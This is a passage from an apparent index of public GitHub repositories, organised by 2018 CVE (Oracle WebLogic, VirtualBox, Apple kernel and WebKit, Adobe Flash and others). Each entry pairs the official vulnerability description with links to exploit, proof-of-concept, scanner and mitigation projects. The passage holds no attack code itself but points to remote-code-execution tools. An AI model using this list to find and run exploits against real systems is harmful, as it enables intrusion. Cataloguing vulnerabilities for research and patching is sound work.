- [Vladimir-Ivanov-Git/sap_igs_xxe](https://github.com/Vladimir-Ivanov-Git/sap_igs_xxe)

### CVE-2018-2628 (2018-04-19)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [forlin/CVE-2018-2628](https://github.com/forlin/CVE-2018-2628)
- [shengqi158/CVE-2018-2628](https://github.com/shengqi158/CVE-2018-2628)
- [skydarker/CVE-2018-2628](https://github.com/skydarker/CVE-2018-2628)
- [jiansiting/weblogic-cve-2018-2628](https://github.com/jiansiting/weblogic-cve-2018-2628)
- [zjxzjx/CVE-2018-2628-detect](https://github.com/zjxzjx/CVE-2018-2628-detect)
- [aedoo/CVE-2018-2628-MultiThreading](https://github.com/aedoo/CVE-2018-2628-MultiThreading)
- [victor0013/CVE-2018-2628](https://github.com/victor0013/CVE-2018-2628)
- [9uest/CVE-2018-2628](https://github.com/9uest/CVE-2018-2628)
- [Shadowshusky/CVE-2018-2628all](https://github.com/Shadowshusky/CVE-2018-2628all)
- [shaoshore/CVE-2018-2628](https://github.com/shaoshore/CVE-2018-2628)
- [tdy218/ysoserial-cve-2018-2628](https://github.com/tdy218/ysoserial-cve-2018-2628)
- [wrysunny/cve-2018-2628](https://github.com/wrysunny/cve-2018-2628)
- [jas502n/CVE-2018-2628](https://github.com/jas502n/CVE-2018-2628)
- [stevenlinfeng/CVE-2018-2628](https://github.com/stevenlinfeng/CVE-2018-2628)
- [likekabin/CVE-2018-2628](https://github.com/likekabin/CVE-2018-2628)
- [Nervous/WebLogic-RCE-exploit](https://github.com/Nervous/WebLogic-RCE-exploit)
- [Lighird/CVE-2018-2628](https://github.com/Lighird/CVE-2018-2628)
- [0xMJ/CVE-2018-2628](https://github.com/0xMJ/CVE-2018-2628)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [seethen/cve-2018-2628](https://github.com/seethen/cve-2018-2628)
- [BabyTeam1024/cve-2018-2628](https://github.com/BabyTeam1024/cve-2018-2628)
- [cscadoge/weblogic-cve-2018-2628](https://github.com/cscadoge/weblogic-cve-2018-2628)

### CVE-2018-2636 (2018-01-18)

Vulnerability in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (subcomponent: Security). Supported versions that are affected are 2.7, 2.8 and 2.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Simphony. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Simphony. CVSS 3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [erpscanteam/CVE-2018-2636](https://github.com/erpscanteam/CVE-2018-2636)
- [Cymmetria/micros_honeypot](https://github.com/Cymmetria/micros_honeypot)

### CVE-2018-2844 (2018-04-19)

Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).

- [renorobert/virtualbox-cve-2018-2844](https://github.com/renorobert/virtualbox-cve-2018-2844)

### CVE-2018-2879 (2018-04-19)

Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Authentication Engine). Supported versions that are affected are 11.1.2.3.0 and 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. While the vulnerability is in Oracle Access Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. Note: Please refer to Doc ID [My Oracle Support Note 2386496.1](http://support.oracle.com/CSP/main/article?cmd=show&type=NOT&id=2386496.1) for instructions on how to address this issue. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).

- [MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit](https://github.com/MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit)
- [AymanElSherif/oracle-oam-authentication-bypas-exploit](https://github.com/AymanElSherif/oracle-oam-authentication-bypas-exploit)
- [redtimmy/OAMBuster](https://github.com/redtimmy/OAMBuster)

### CVE-2018-2893 (2018-07-18)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [sry309/CVE-2018-2893](https://github.com/sry309/CVE-2018-2893)
- [artofwar344/CVE-2018-2893](https://github.com/artofwar344/CVE-2018-2893)
- [bigsizeme/CVE-2018-2893](https://github.com/bigsizeme/CVE-2018-2893)
- [pyn3rd/CVE-2018-2893](https://github.com/pyn3rd/CVE-2018-2893)
- [qianl0ng/CVE-2018-2893](https://github.com/qianl0ng/CVE-2018-2893)
- [jas502n/CVE-2018-2893](https://github.com/jas502n/CVE-2018-2893)
- [ianxtianxt/CVE-2018-2893](https://github.com/ianxtianxt/CVE-2018-2893)

### CVE-2018-2894 (2018-07-18)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [111ddea/cve-2018-2894](https://github.com/111ddea/cve-2018-2894)
- [LandGrey/CVE-2018-2894](https://github.com/LandGrey/CVE-2018-2894)
- [jas502n/CVE-2018-2894](https://github.com/jas502n/CVE-2018-2894)
- [k8gege/PyLadon](https://github.com/k8gege/PyLadon)

### CVE-2018-3191 (2018-10-17)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [arongmh/CVE-2018-3191](https://github.com/arongmh/CVE-2018-3191)
- [m00zh33/CVE-2018-3191](https://github.com/m00zh33/CVE-2018-3191)
- [Libraggbond/CVE-2018-3191](https://github.com/Libraggbond/CVE-2018-3191)
- [jas502n/CVE-2018-3191](https://github.com/jas502n/CVE-2018-3191)
- [mackleadmire/CVE-2018-3191-Rce-Exploit](https://github.com/mackleadmire/CVE-2018-3191-Rce-Exploit)

### CVE-2018-3245 (2018-10-17)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [pyn3rd/CVE-2018-3245](https://github.com/pyn3rd/CVE-2018-3245)
- [jas502n/CVE-2018-3245](https://github.com/jas502n/CVE-2018-3245)
- [ianxtianxt/CVE-2018-3245](https://github.com/ianxtianxt/CVE-2018-3245)

### CVE-2018-3252 (2018-10-17)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [jas502n/CVE-2018-3252](https://github.com/jas502n/CVE-2018-3252)
- [go-spider/CVE-2018-3252](https://github.com/go-spider/CVE-2018-3252)
- [pyn3rd/CVE-2018-3252](https://github.com/pyn3rd/CVE-2018-3252)

### CVE-2018-3260
- [ionescu007/SpecuCheck](https://github.com/ionescu007/SpecuCheck)

### CVE-2018-3295 (2018-10-17)

Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). The supported version that is affected is Prior to 5.2.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).

- [ndureiss/e1000_vulnerability_exploit](https://github.com/ndureiss/e1000_vulnerability_exploit)
- [jeongzero8732/cve-2018-3295](https://github.com/jeongzero8732/cve-2018-3295)

### CVE-2018-3608 (2018-07-06)

A vulnerability in Trend Micro Maximum Security's (Consumer) 2018 (versions 12.0.1191 and below) User-Mode Hooking (UMH) driver could allow an attacker to create a specially crafted packet that could alter a vulnerable system in such a way that malicious code could be injected into other processes.

- [gguaiker/Trend_Micro_POC](https://github.com/gguaiker/Trend_Micro_POC)

### CVE-2018-3639 (2018-05-22)

Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.

- [tyhicks/ssbd-tools](https://github.com/tyhicks/ssbd-tools)
- [malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate](https://github.com/malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate)
- [mmxsrup/CVE-2018-3639](https://github.com/mmxsrup/CVE-2018-3639)
- [Shuiliusheng/CVE-2018-3639-specter-v4-](https://github.com/Shuiliusheng/CVE-2018-3639-specter-v4-)

### CVE-2018-3760 (2018-06-26)

There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exist on the filesystem outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the workarounds immediately.

- [mpgn/CVE-2018-3760](https://github.com/mpgn/CVE-2018-3760)
- [cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-](https://github.com/cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-)

### CVE-2018-3783 (2018-08-17)

A privilege escalation detected in flintcms versions <= 1.1.9 allows account takeover due to blind MongoDB injection in password reset.

- [nisaruj/nosqli-flintcms](https://github.com/nisaruj/nosqli-flintcms)

### CVE-2018-3786 (2018-08-24)

A command injection vulnerability in egg-scripts <v2.8.1 allows arbitrary shell command execution through a maliciously crafted command line argument.

- [erik-krogh/egg-scripts-CVE-2018-3786](https://github.com/erik-krogh/egg-scripts-CVE-2018-3786)

### CVE-2018-3810 (2018-01-01)

Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.

- [lucad93/CVE-2018-3810](https://github.com/lucad93/CVE-2018-3810)
- [cved-sources/cve-2018-3810](https://github.com/cved-sources/cve-2018-3810)
- [nth347/CVE-2018-3810_exploit](https://github.com/nth347/CVE-2018-3810_exploit)

### CVE-2018-3811 (2018-01-01)

SQL Injection vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to execute SQL queries in the context of the web server. The saveGoogleAdWords() function in smartgooglecode.php did not use prepared statements and did not sanitize the $_POST["oId"] variable before passing it as input into the SQL query.

- [cved-sources/cve-2018-3811](https://github.com/cved-sources/cve-2018-3811)

### CVE-2018-4013 (2018-10-19)

An exploitable code execution vulnerability exists in the HTTP packet-parsing functionality of the LIVE555 RTSP server library version 0.92. A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. An attacker can send a packet to trigger this vulnerability.

- [DoubleMice/cve-2018-4013](https://github.com/DoubleMice/cve-2018-4013)
- [r3dxpl0it/RTSPServer-Code-Execution-Vulnerability](https://github.com/r3dxpl0it/RTSPServer-Code-Execution-Vulnerability)

### CVE-2018-4084 (2018-04-03)

An issue was discovered in certain Apple products. macOS before 10.13.3 is affected. The issue involves the "Wi-Fi" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.

- [dybrkr/wifi_leak](https://github.com/dybrkr/wifi_leak)

### CVE-2018-4087 (2018-04-03)

An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2 is affected. The issue involves the "Core Bluetooth" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

- [rani-i/bluetoothdPoC](https://github.com/rani-i/bluetoothdPoC)
- [MTJailed/UnjailMe](https://github.com/MTJailed/UnjailMe)
- [joedaguy/Exploit11.2](https://github.com/joedaguy/Exploit11.2)

### CVE-2018-4110 (2018-04-03)

An issue was discovered in certain Apple products. iOS before 11.3 is affected. The issue involves the "Web App" component. It allows remote attackers to bypass intended restrictions on cookie persistence.

- [bencompton/ios11-cookie-set-expire-issue](https://github.com/bencompton/ios11-cookie-set-expire-issue)

### CVE-2018-4121 (2018-04-03)

An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.

- [FSecureLABS/CVE-2018-4121](https://github.com/FSecureLABS/CVE-2018-4121)
- [likekabin/CVE-2018-4121](https://github.com/likekabin/CVE-2018-4121)
- [jezzus/CVE-2018-4121](https://github.com/jezzus/CVE-2018-4121)

### CVE-2018-4124 (2018-04-03)

An issue was discovered in certain Apple products. iOS before 11.2.6 is affected. macOS before 10.13.3 Supplemental Update is affected. tvOS before 11.2.6 is affected. watchOS before 4.2.3 is affected. The issue involves the "CoreText" component. It allows remote attackers to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact via a crafted string containing a certain Telugu character.

- [jamf/TELUGU_CVE-2018-4124_POC](https://github.com/jamf/TELUGU_CVE-2018-4124_POC)

### CVE-2018-4150 (2018-04-03)

An issue was discovered in certain Apple products. iOS before 11.3 is affected. macOS before 10.13.4 is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

- [Jailbreaks/CVE-2018-4150](https://github.com/Jailbreaks/CVE-2018-4150)
- [rpwnage/LovelySn0w](https://github.com/rpwnage/LovelySn0w)
- [littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-](https://github.com/littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-)

### CVE-2018-4185 (2019-01-11)

In iOS before 11.3, tvOS before 11.3, watchOS before 4.3, and macOS before High Sierra 10.13.4, an information disclosure issue existed in the transition of program state. This issue was addressed with improved state handling.

- [bazad/x18-leak](https://github.com/bazad/x18-leak)
- [xigexbh/bazad1](https://github.com/xigexbh/bazad1)
- [Giler2004/bazad1](https://github.com/Giler2004/bazad1)

### CVE-2018-4193 (2018-06-08)

An issue was discovered in certain Apple products. macOS before 10.13.5 is affected. The issue involves the "Windows Server" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

- [Synacktiv-contrib/CVE-2018-4193](https://github.com/Synacktiv-contrib/CVE-2018-4193)

### CVE-2018-4233 (2018-06-08)

An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.

- [saelo/cve-2018-4233](https://github.com/saelo/cve-2018-4233)

### CVE-2018-4241 (2018-06-08)

An issue was discovered in certain Apple products. iOS before 11.4 is affected. macOS before 10.13.5 is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "Kernel" component. A buffer overflow in mptcp_usr_connectx allows attackers to execute arbitrary code in a privileged context via a crafted app.

- [0neday/multi_path](https://github.com/0neday/multi_path)

### CVE-2018-4242 (2018-06-08)

An issue was discovered in certain Apple products. macOS before 10.13.5 is affected. The issue involves the "Hypervisor" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

- [yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-](https://github.com/yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-)

### CVE-2018-4243 (2018-06-08)

An issue was discovered in certain Apple products. iOS before 11.4 is affected. macOS before 10.13.5 is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "Kernel" component. A buffer overflow in getvolattrlist allows attackers to execute arbitrary code in a privileged context via a crafted app.

- [Jailbreaks/empty_list](https://github.com/Jailbreaks/empty_list)

### CVE-2018-4248 (2019-04-03)

An out-of-bounds read was addressed with improved input validation. This issue affected versions prior to iOS 11.4.1, macOS High Sierra 10.13.6, tvOS 11.4.1, watchOS 4.3.2.

- [bazad/xpc-string-leak](https://github.com/bazad/xpc-string-leak)

### CVE-2018-4280 (2019-04-03)

A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 11.4.1, macOS High Sierra 10.13.6, tvOS 11.4.1, watchOS 4.3.2.

- [bazad/launchd-portrep](https://github.com/bazad/launchd-portrep)
- [bazad/blanket](https://github.com/bazad/blanket)

### CVE-2018-4327 (2019-04-03)

A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 11.4.1.

- [omerporze/brokentooth](https://github.com/omerporze/brokentooth)
- [harryanon/POC-CVE-2018-4327-and-CVE-2018-4330](https://github.com/harryanon/POC-CVE-2018-4327-and-CVE-2018-4330)

### CVE-2018-4330 (2019-01-11)

In iOS before 11.4, a memory corruption issue exists and was addressed with improved memory handling.

- [omerporze/toothfairy](https://github.com/omerporze/toothfairy)

### CVE-2018-4331 (2019-04-03)

A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.

- [bazad/gsscred-race](https://github.com/bazad/gsscred-race)

### CVE-2018-4343 (2019-04-03)

A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.

- [bazad/gsscred-move-uaf](https://github.com/bazad/gsscred-move-uaf)

### CVE-2018-4407 (2019-04-03)

A memory corruption issue was addressed with improved validation. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.

- [Pa55w0rd/check_icmp_dos](https://github.com/Pa55w0rd/check_icmp_dos)
- [unixpickle/cve-2018-4407](https://github.com/unixpickle/cve-2018-4407)
- [s2339956/check_icmp_dos-CVE-2018-4407-](https://github.com/s2339956/check_icmp_dos-CVE-2018-4407-)
- [farisv/AppleDOS](https://github.com/farisv/AppleDOS)
- [WyAtu/CVE-2018-4407](https://github.com/WyAtu/CVE-2018-4407)
- [zteeed/CVE-2018-4407-IOS](https://github.com/zteeed/CVE-2018-4407-IOS)
- [SamDecrock/node-cve-2018-4407](https://github.com/SamDecrock/node-cve-2018-4407)
- [r3dxpl0it/CVE-2018-4407](https://github.com/r3dxpl0it/CVE-2018-4407)
- [lucagiovagnoli/CVE-2018-4407](https://github.com/lucagiovagnoli/CVE-2018-4407)
- [anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407](https://github.com/anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407)
- [soccercab/wifi](https://github.com/soccercab/wifi)
- [zeng9t/CVE-2018-4407-iOS-exploit](https://github.com/zeng9t/CVE-2018-4407-iOS-exploit)
- [5431/CVE-2018-4407](https://github.com/5431/CVE-2018-4407)
- [pwnhacker0x18/iOS-Kernel-Crash](https://github.com/pwnhacker0x18/iOS-Kernel-Crash)
- [Fans0n-Fan/CVE-2018-4407](https://github.com/Fans0n-Fan/CVE-2018-4407)
- [szabo-tibor/CVE-2018-4407](https://github.com/szabo-tibor/CVE-2018-4407)

### CVE-2018-4411 (2019-04-03)

A memory corruption issue was addressed with improved input validation. This issue affected versions prior to macOS Mojave 10.14.

- [lilang-wu/POC-CVE-2018-4411](https://github.com/lilang-wu/POC-CVE-2018-4411)

### CVE-2018-4415 (2019-04-03)

A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to macOS Mojave 10.14.1.

- [T1V0h/CVE-2018-4415](https://github.com/T1V0h/CVE-2018-4415)

### CVE-2018-4416 (2019-04-03)

Multiple memory corruption issues were addressed with improved memory handling. This issue affected versions prior to iOS 12.1, tvOS 12.1, watchOS 5.1, Safari 12.0.1, iTunes 12.9.1, iCloud for Windows 7.8.

- [erupmi/CVE-2018-4416-exploit](https://github.com/erupmi/CVE-2018-4416-exploit)

### CVE-2018-4431 (2019-04-03)

A memory initialization issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, macOS Mojave 10.14.2, tvOS 12.1.1, watchOS 5.1.2.

- [ktiOSz/PoC_iOS12](https://github.com/ktiOSz/PoC_iOS12)

### CVE-2018-4441 (2019-04-03)

A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.

- [Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit](https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit)

### CVE-2018-4878 (2018-02-06)

A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018.

- [ydl555/CVE-2018-4878-](https://github.com/ydl555/CVE-2018-4878-)
- [mdsecactivebreach/CVE-2018-4878](https://github.com/mdsecactivebreach/CVE-2018-4878)
- [hybridious/CVE-2018-4878](https://github.com/hybridious/CVE-2018-4878)
- [vysecurity/CVE-2018-4878](https://github.com/vysecurity/CVE-2018-4878)
- [KathodeN/CVE-2018-4878](https://github.com/KathodeN/CVE-2018-4878)
- [SyFi/CVE-2018-4878](https://github.com/SyFi/CVE-2018-4878)
- [ydl555/CVE-2018-4878](https://github.com/ydl555/CVE-2018-4878)
- [B0fH/CVE-2018-4878](https://github.com/B0fH/CVE-2018-4878)
- [Yable/CVE-2018-4878](https://github.com/Yable/CVE-2018-4878)
- [HuanWoWeiLan/SoftwareSystemSecurity-2019](https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019)
- [lvyoshino/CVE-2018-4878](https://github.com/lvyoshino/CVE-2018-4878)

### CVE-2018-4879 (2018-02-27)

An issue was discovered in Adobe Acrobat Reader 2018.009.20050 and earlier versions, 2017.011.30070 and earlier versions, 2015.006.30394 and earlier versions. The vulnerability is caused by the computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.

- [H3llozy/CVE-2018-4879](https://github.com/H3llozy/CVE-2018-4879)

### CVE-2018-4901 (2018-02-27)

An issue was discovered in Adobe Acrobat Reader 2018.009.20050 and earlier versions, 2017.011.30070 and earlier versions, 2015.006.30394 and earlier versions. The vulnerability is caused by the computation that writes data past the end of the intended buffer; the computation is part of the document identity representation. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.

- [bigric3/CVE-2018-4901](https://github.com/bigric3/CVE-2018-4901)

### CVE-2018-5146 (2018-06-11)

An out of bounds memory write while processing Vorbis audio data was reported through the Pwn2Own contest. This vulnerability affects Firefox < 59.0.1, Firefox ESR < 52.7.2, and Thunderbird < 52.7.

- [f01965/CVE-2018-5146](https://github.com/f01965/CVE-2018-5146)

### CVE-2018-5158 (2018-06-11)

The PDF viewer does not sufficiently sanitize PostScript calculator functions, allowing malicious JavaScript to be injected through a crafted PDF file. This JavaScript can then be run with the permissions of the PDF viewer by its worker. This vulnerability affects Firefox ESR < 52.8 and Firefox < 60.

- [ppcrab/CVE-2018-5158](https://github.com/ppcrab/CVE-2018-5158)
- [puzzle-tools/-CVE-2018-5158.pdf](https://github.com/puzzle-tools/-CVE-2018-5158.pdf)

### CVE-2018-5234 (2018-04-30)

The Norton Core router prior to v237 may be susceptible to a command injection exploit. This is a type of attack in which the goal is execution of arbitrary commands on the host system via vulnerable software.

- [embedi/ble_norton_core](https://github.com/embedi/ble_norton_core)
- [saruman9/ble_connect_rust](https://github.com/saruman9/ble_connect_rust)

### CVE-2018-5333 (2018-01-11)

In the Linux kernel through 4.14.13, the rds_cmsg_atomic function in net/rds/rdma.c mishandles cases where page pinning fails or an invalid address is supplied, leading to an rds_atomic_free_op NULL pointer dereference.

- [hoanganh2k/cve-2018-5333](https://github.com/hoanganh2k/cve-2018-5333)

### CVE-2018-5353 (2020-09-29)

The custom GINA/CP module in Zoho ManageEngine ADSelfService Plus before 5.5 build 5517 allows remote attackers to execute code and escalate privileges via spoofing. It does not authenticate the intended server before opening a browser window. An unauthenticated attacker capable of conducting a spoofing attack can redirect the browser to gain execution in the context of the WinLogon.exe process. If Network Level Authentication is not enforced, the vulnerability can be exploited via RDP. Additionally, if the web server has a misconfigured certificate then no spoofing attack is required.

- [missing0x00/CVE-2018-5353](https://github.com/missing0x00/CVE-2018-5353)

### CVE-2018-5354 (2020-09-29)

The custom GINA/CP module in ANIXIS Password Reset Client before version 3.22 allows remote attackers to execute code and escalate privileges via spoofing. When the client is configured to use HTTP, it does not authenticate the intended server before opening a browser window. An unauthenticated attacker capable of conducting a spoofing attack can redirect the browser to gain execution in the context of the WinLogon.exe process. If Network Level Authentication is not enforced, the vulnerability can be exploited via RDP.

- [missing0x00/CVE-2018-5354](https://github.com/missing0x00/CVE-2018-5354)

### CVE-2018-5711 (2018-01-16)

gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.

- [huzhenghui/Test-7-2-0-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711)
- [huzhenghui/Test-7-2-1-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-1-PHP-CVE-2018-5711)

### CVE-2018-5728 (2018-01-16)

Cobham Sea Tel 121 build 222701 devices allow remote attackers to obtain potentially sensitive information via a /cgi-bin/getSysStatus request, as demonstrated by the Latitude/Longitude of the ship, or satellite details.

- [ezelf/seatel_terminals](https://github.com/ezelf/seatel_terminals)

### CVE-2018-5740 (2019-01-16)

"deny-answer-aliases" is a little-used feature intended to help recursive server operators protect end users against DNS rebinding attacks, a potential method of circumventing the security model used by client browsers. However, a defect in this feature makes it easy, when the feature is in use, to experience an assertion failure in name.c. Affects BIND 9.7.0->9.8.8, 9.9.0->9.9.13, 9.10.0->9.10.8, 9.11.0->9.11.4, 9.12.0->9.12.2, 9.13.0->9.13.2.

- [sischkg/cve-2018-5740](https://github.com/sischkg/cve-2018-5740)

### CVE-2018-5767 (2018-02-15)

An issue was discovered on Tenda AC15 V15.03.1.16_multi devices. A remote, unauthenticated attacker can gain remote code execution on the device with a crafted password parameter for the COOKIE header.

